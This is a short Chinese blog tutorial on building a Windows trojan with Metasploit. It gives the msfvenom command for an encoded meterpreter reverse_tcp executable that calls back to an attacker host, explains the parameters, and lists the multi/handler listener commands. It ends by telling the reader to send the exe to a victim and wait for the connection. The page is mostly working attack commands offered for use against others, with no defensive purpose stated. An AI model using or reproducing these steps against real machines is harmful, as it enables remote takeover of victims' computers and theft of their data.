【教程】Metasploit之windows木马

Metasploit之windows木马


KALI IP:192.168.186.130


1.生成windows木马

msfvenom -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.186.130 LPORT=5555 -f exe > muma.exe
命令参数介绍
-e x64/shikata_ga_nai  \\如果对方电脑是32位参数位x86,64位参数为x64
-i 5      \\编码次数
-f exe   \\生成的文件后缀
- LHOST  \\KALI IP
- LPORT   \\监听端口

2.启动metasploit进行监听

msfconsole
3.使用handeler模块
use exploit/multi/handler
4.设置监听参数
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.186.130  \\kali IP
set lport 5555   \\端口

5.开始攻击,将生成的exe文件发送给受害者坐等上线。

exploit


本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】Metasploit之windows木马
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)